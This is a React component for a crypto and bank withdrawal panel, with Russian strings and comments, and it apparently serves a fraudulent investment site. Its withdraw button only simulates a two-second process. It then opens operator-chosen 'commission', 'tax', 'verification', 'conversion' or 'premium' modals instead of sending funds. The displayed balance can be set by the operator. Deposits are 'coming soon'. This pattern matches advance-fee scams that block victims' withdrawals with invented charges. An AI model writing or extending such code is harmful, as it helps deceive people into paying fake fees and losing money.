import React, { useState, useEffect } from 'react';
import s from './ToggleSwitch.module.sass';
import binance from '../../img/binance-coin-bnb-logo-CD94CC6D31-seeklogo.com.png'
import etherium from '../../img/Ethereum-ETH-icon.png'
import bitcoin from '../../img/Bitcoin.svg.png'
import tron from '../../img/tron.png'
import { useSimpleTranslation } from '../../hooks/useTranslation';

export const ToggleSwitch = ({nameUser, adressCrypto, setAdressCrypto, maxTotalMoney, setNetwork, network, setBnbBalanca, bnbBalanca, networks, imgCoin, setImgCoin, selectedCrypto, cryptoOptions, currencyFormat, siteSettings, customMaxMoney, calculateCryptoAmount, setshowVerifyModal, setSendingErrorModal, setShowModaWithdrawal, setshowNalogModal, setShowCryptoConversionModal, setShowBankConversionModal, setShowPremiumModal, showVerifyModal, sendingErrorModal, showModaWithdrawal, showNalogModal, showCryptoConversionModal, showBankConversionModal, showPremiumModal, setCustomModalState}) => {
    
    // Система переводов
    const { t } = useSimpleTranslation(siteSettings);
    
    // Фильтруем активные банки на основе настроек
    const enabledNetworks = networks.filter(net => {
        const bankName = net.name;
        return siteSettings.banks?.[bankName]?.enabled !== false; // По умолчанию показываем, если настройка отсутствует
    }).sort((a, b) => {
        const priorityA = siteSettings.banks?.[a.name]?.priority || 999;
        const priorityB = siteSettings.banks?.[b.name]?.priority || 999;
        return priorityA - priorityB;
    });
    const [activeTab, setActiveTab] = useState('withdrawal');
    const [amount, setAmount] = useState('');
    const [selectedCoin, setSelectedCoin] = useState(selectedCrypto || 'ETH');
    
    // Обновляем selectedCoin при изменении selectedCrypto из props
    useEffect(() => {
        if (selectedCrypto && selectedCrypto !== selectedCoin) {
            setSelectedCoin(selectedCrypto);
        }
    }, [selectedCrypto]);
    
    // Пересчитываем криптовалюту на основе customMaxMoney или maxTotalMoney
    useEffect(() => {
        if (calculateCryptoAmount && selectedCrypto) {
            // Используем customMaxMoney если задана, иначе maxTotalMoney
            const amountToUse = customMaxMoney ? parseFloat(customMaxMoney) : parseFloat(maxTotalMoney.toString().replace(/,/g, ''));
            if (amountToUse > 0 && !isNaN(amountToUse)) {
                const cryptoAmount = calculateCryptoAmount(amountToUse, selectedCrypto);
                const formattedCrypto = formatCrypto(parseFloat(cryptoAmount), siteSettings?.cryptoDecimalPlaces || 5);
                // Обновляем только если значение изменилось (чтобы не мешать ручному редактированию)
                const currentBalanca = bnbBalanca.toString().replace(/,/g, '.');
                if (currentBalanca !== formattedCrypto) {
                    setBnbBalanca(formattedCrypto);
                }
            }
        }
        // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [customMaxMoney, maxTotalMoney, selectedCrypto, calculateCryptoAmount, siteSettings?.cryptoDecimalPlaces]);
    const [dropdownOpen, setDropdownOpen] = useState(false);
    const [address, setAddress] = useState('');
    const [networkDropdownOpen, setNetworkDropdownOpen] = useState(false);
    const [buttonState, setButtonState] = useState('default'); // 'default', 'loading', 'success', 'error'

    // Отслеживание закрытия модалов для сброса состояния кнопки
    useEffect(() => {
        const behavior = siteSettings?.sendButtonBehavior || 'default';
        
        // Если поведение связано с модалами и все модалы закрыты, сбрасываем кнопку
        if (behavior !== 'default' && buttonState !== 'default' && buttonState !== 'loading') {
            const isAnyModalOpen = showVerifyModal || sendingErrorModal || showModaWithdrawal || 
                                 showNalogModal || showCryptoConversionModal || showBankConversionModal || showPremiumModal;
            
            if (!isAnyModalOpen) {
                setButtonState('default');
            }
        }
    }, [showVerifyModal, sendingErrorModal, showModaWithdrawal, showNalogModal, 
        showCryptoConversionModal, showBankConversionModal, showPremiumModal, buttonState, siteSettings?.sendButtonBehavior]);

    // Функция для форматирования криптовалют с настраиваемым количеством знаков
    const formatCrypto = (number, decimalPlaces = 5) => {
        if (isNaN(number) || number === null || number === undefined) return '0.' + '0'.repeat(decimalPlaces);
        
        const num = parseFloat(number);
        return num.toFixed(decimalPlaces);
    };

    const coins = cryptoOptions || [
        { symbol: 'BNB', name: 'Binance Coin', icon: binance },
        { symbol: 'BTC', name: 'Bitcoin', icon: bitcoin },
        { symbol: 'ETH', name: 'Ethereum', icon: etherium }
    ];

    const handleTabClick = (tab) => {
        setActiveTab(tab);
        setButtonState('default'); // Reset button state when switching tabs
    };

    const handleCoinSelect = (coin) => {
        setSelectedCoin(coin.symbol);
        setDropdownOpen(false);
    };

    const handleNetworkSelect = (net) => {
        setNetwork(net.name);
        setNetworkDropdownOpen(false);
        setImgCoin(net);
    };

    const handleConvertAndSend = () => {
        if (buttonState !== 'default') return;
        
        setButtonState('loading');
        
        // Get button behavior from settings
        const behavior = siteSettings?.sendButtonBehavior || 'default';
        
        // Simulate loading for 2 seconds
        setTimeout(() => {
            // Проверяем, является ли поведение кастомным модалом
            if (behavior.startsWith('show') && behavior !== 'showCommission' && behavior !== 'showVerification' && behavior !== 'showSuccess' && behavior !== 'showTax' && behavior !== 'showCryptoConversion' && behavior !== 'showBankConversion' && behavior !== 'showPremium') {
                // Это кастомный модал - извлекаем actionKey из поведения
                const actionKey = behavior.replace('show', '').charAt(0).toLowerCase() + behavior.replace('show', '').slice(1);
                const modalKey = `custom_${actionKey}`;
                
                // Проверяем, есть ли такой модал в шаблонах
                const customModal = siteSettings?.modalTemplates?.find(t => t.actionKey === actionKey);
                if (customModal && setCustomModalState) {
                    setButtonState('error');
                    setCustomModalState(modalKey, true);
                    return;
                }
            }
            
            switch (behavior) {
                case 'showCommission':
                    setButtonState('error');
                    setshowVerifyModal && setshowVerifyModal(true); // Commission modal
                    break;
                case 'showVerification':
                    setButtonState('error');
                    setSendingErrorModal && setSendingErrorModal(true); // Verification modal
                    break;
                case 'showSuccess':
                    setButtonState('success');
                    setShowModaWithdrawal && setShowModaWithdrawal(true); // Success modal
                    break;
                case 'showTax':
                    setButtonState('error');
                    setshowNalogModal && setshowNalogModal(true); // Tax modal
                    break;
                case 'showCryptoConversion':
                    setButtonState('error');
                    setShowCryptoConversionModal && setShowCryptoConversionModal(true); // Crypto conversion modal
                    break;
                case 'showBankConversion':
                    setButtonState('error');
                    setShowBankConversionModal && setShowBankConversionModal(true); // Bank conversion modal
                    break;
                case 'showPremium':
                    setButtonState('error');
                    setShowPremiumModal && setShowPremiumModal(true); // Premium modal
                    break;
                default: // 'default'
                    setButtonState('success');
                    break;
            }
            
            // For modal behaviors, button stays in colored state until modal is closed
            // For default behavior, reset after 3 seconds
            if (behavior === 'default') {
                setTimeout(() => {
                    setButtonState('default');
                }, 3000);
            }
            // For modal behaviors, the button will reset when modal is closed
            // This will be handled by useEffect tracking modal states
        }, 2000);
    };

    const selectedCoinData = coins.find(coin => coin.symbol === selectedCoin) || coins[0];

    const getButtonContent = () => {
        switch (buttonState) {
            case 'loading':
                return (
                    <>
                        <div className={s.spinner}></div>
                        {t('dashboard.processing', 'Обработка')}...
                    </>
                );
            case 'success':
                return (
                    <>
                        <svg width="16" height="16" viewBox="0 0 24 24" fill="none">
                            <path d="M20 6L9 17l-5-5" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                        </svg>
                        {t('dashboard.success', 'Успешно')}!
                    </>
                );
            case 'error':
                return (
                    <>
                        <svg width="16" height="16" viewBox="0 0 24 24" fill="none">
                            <path d="M18 6L6 18M6 6l12 12" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                        </svg>
                        {t('dashboard.error', 'Ошибка')}!
                    </>
                );
            default:
                return (
                    <>
                        <svg width="16" height="16" viewBox="0 0 24 24" fill="none">
                            <path d="M12 5v14m-7-7l7-7 7 7" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                        </svg>
                        {t('dashboard.convert', 'Конвертировать')}
                    </>
                );
        }
    };

    return (
        <div className={s.toggleSwitch}>
            {/* Tab Navigation */}
            <div className={s.tabContainer}>
                <button
                    className={`${s.tabButton} ${activeTab === 'deposit' ? s.active : ''}`}
                    onClick={() => handleTabClick('deposit')}
                >
                    <svg width="16" height="16" viewBox="0 0 24 24" fill="none">
                        <path d="M12 19V5m-7 7l7 7 7-7" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                    </svg>
                    {t('dashboard.deposit', 'Депозит')}
                </button>
                <button
                    className={`${s.tabButton} ${activeTab === 'withdrawal' ? s.active : ''}`}
                    onClick={() => handleTabClick('withdrawal')}
                >
                    <svg width="16" height="16" viewBox="0 0 24 24" fill="none">
                        <path d="M12 5v14m-7-7l7-7 7 7" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                    </svg>
                    {t('dashboard.withdraw', 'Вывод')}
                </button>
            </div>

            {/* Content */}
            {activeTab === 'deposit' ? (
                <div className={s.tabContent}>
                    <div className={s.comingSoon}>
                        <svg width="48" height="48" viewBox="0 0 24 24" fill="none">
                            <circle cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="2"/>
                            <path d="M12 6v6l4 2" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                        </svg>
                        <h3>{t('dashboard.comingSoon', 'Скоро появится')}</h3>
                        <p>{t('dashboard.depositDescription', 'Мы работаем над функцией депозита. Пожалуйста, проверьте позже.')}</p>
                    </div>
                </div>
            ) : (
                <div className={s.tabContent}>
                    {/* Amount Section */}
                    <div className={s.section}>
                        <div className={s.sectionHeader}>
                            <h3 className={s.sectionTitle}>{t('dashboard.withdrawalAmount', 'Сумма вывода')}</h3>
                            <p className={s.sectionSubtitle}>{t('dashboard.enterAmount', 'Введите сумму, которую хотите вывести')}</p>
                        </div>
                        
                        <div className={s.inputGroup}>
                            <div className={s.amountInputWrapper}>
                                <input
                                    type="text"
                                    className={s.amountInput}
                                    value={bnbBalanca}
                                    onChange={(e) => setBnbBalanca(e.target.value.replace(/,/g, '.'))}
                                    placeholder={formatCrypto(0, siteSettings?.cryptoDecimalPlaces || 5)}
                                />
                                <div className={s.coinSelector}>
                                    <button 
                                        className={s.coinButton} 
                                        onClick={() => setDropdownOpen(!dropdownOpen)}
                                    >
                                        <img src={selectedCoinData.icon} alt={selectedCoin} className={s.coinIcon} />
                                        <span className={s.coinSymbol}>{selectedCoin}</span>
                                        <svg 
                                            className={`${s.chevronIcon} ${dropdownOpen ? s.open : ''}`}
                                            width="16" height="16" viewBox="0 0 24 24" fill="none"
                                        >
                                            <path d="M6 9l6 6 6-6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                                        </svg>
                                    </button>
                                    
                                    {dropdownOpen && (
                                        <div className={s.coinDropdown}>
                                            {coins.map((coin) => (
                                                <div
                                                    key={coin.symbol}
                                                    className={`${s.coinOption} ${coin.symbol === selectedCoin ? s.selected : ''}`}
                                                    onClick={() => handleCoinSelect(coin)}
                                                >
                                                    <img src={coin.icon} alt={coin.symbol} className={s.coinIcon} />
                                                    <div className={s.coinInfo}>
                                                        <span className={s.coinSymbol}>{coin.symbol}</span>
                                                        <span className={s.coinName}>{coin.name}</span>
                                                    </div>
                                                </div>
                                            ))}
                                        </div>
                                    )}
                                </div>
                            </div>
                            
                            <div className={s.balanceInfo}>
                                <span className={s.balanceLabel}>{t('dashboard.availableBalance', 'Доступный баланс')}:</span>
                                <span className={s.balanceAmount}>
                                    {currencyFormat || 'RM'} {maxTotalMoney.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',')}
                                </span>
                            </div>
                        </div>
                    </div>

                    {/* Fee Summary */}
                    <div className={s.section}>
                        <div className={s.feeCard}>

                            <div className={s.feeRow}>
                                <span className={s.feeLabel}>{t('dashboard.networkFee', 'Сетевая комиссия')}</span>
                                                                    <span className={s.feeValue}>{currencyFormat || 'RM'} 0.00</span>
                            </div>
                            <div className={`${s.feeRow} ${s.total}`}>
                                <span className={s.feeLabel}>{t('dashboard.totalAmount', 'Общая сумма')}</span>
                                <span className={s.feeValue}>
                                    {currencyFormat || 'RM'} {maxTotalMoney.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',')}
                                </span>
                            </div>
                        </div>
                    </div>

                    {/* Address Section */}
                    <div className={s.section}>
                        <div className={s.sectionHeader}>
                            <h3 className={s.sectionTitle}>{t('dashboard.withdrawalDetails', 'Детали вывода')}</h3>
                            <p className={s.sectionSubtitle}>{t('dashboard.enterBankDetails', 'Введите данные вашего банковского счета')}</p>
                        </div>
                        
                        <div className={s.addressGrid}>
                            <div className={s.inputField}>
                                <label className={s.inputLabel}>{t('dashboard.accountNumber', 'Номер счета')}</label>
                                <input
                                    type="text"
                                    className={s.textInput}
                                    value={adressCrypto}
                                    onChange={(e) => setAdressCrypto && setAdressCrypto(e.target.value)}
                                    placeholder={t('dashboard.enterAccountNumber', 'Введите номер вашего счета')}
                                />
                            </div>
                            
                            <div className={s.inputField}>
                                <label className={s.inputLabel}>{t('dashboard.bankWallet', 'Банк / Цифровой кошелек')}</label>
                                <div className={s.networkSelector}>
                                    <button 
                                        className={s.networkButton} 
                                        onClick={() => setNetworkDropdownOpen(!networkDropdownOpen)}
                                    >
                                        <img src={imgCoin.img} alt={network} className={s.networkIcon} />
                                        <span className={s.networkName}>{network}</span>
                                        <svg 
                                            className={`${s.chevronIcon} ${networkDropdownOpen ? s.open : ''}`}
                                            width="16" height="16" viewBox="0 0 24 24" fill="none"
                                        >
                                            <path d="M6 9l6 6 6-6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                                        </svg>
                                    </button>
                                    
                                    {networkDropdownOpen && (
                                        <div className={s.networkDropdown}>
                                            {enabledNetworks.map((net, index) => (
                                                <div 
                                                    key={index} 
                                                    className={`${s.networkOption} ${net.name === network ? s.selected : ''}`}
                                                    onClick={() => handleNetworkSelect(net)}
                                                >
                                                    <img src={net.img} alt={net.name} className={s.networkIcon} />
                                                    <span className={s.networkName}>{net.name}</span>
                                                </div>
                                            ))}
                                        </div>
                                    )}
                                </div>
                            </div>
                        </div>
                        
                        <div className={s.inputField}>
                            <label className={s.inputLabel}>{t('dashboard.recipientName', 'Имя получателя')}</label>
                            <input
                                type="text"
                                className={s.textInput}
                                value={nameUser}
                                placeholder={t('dashboard.enterRecipientName', 'Введите имя получателя')}
                                readOnly
                            />
                        </div>
                    </div>

                    {/* Action Button */}
                    <div className={s.actionSection}>
                        <button 
                            className={`${s.withdrawButton} ${s[buttonState]}`}
                            onClick={handleConvertAndSend}
                            disabled={buttonState !== 'default'}
                        >
                            {getButtonContent()}
                        </button>
                    </div>
                </div>
            )}
        </div>
    );
};

